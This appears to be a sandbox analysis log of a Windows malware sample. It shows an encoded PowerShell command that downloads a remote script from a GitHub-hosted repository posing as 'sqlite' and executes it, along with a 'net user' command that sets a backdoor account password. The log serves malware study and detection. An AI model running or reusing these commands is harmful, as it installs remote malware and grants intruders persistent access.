C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:2328
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:3044
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1336
-
-
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵PID:2124
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵PID:2824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵PID:1324
-
-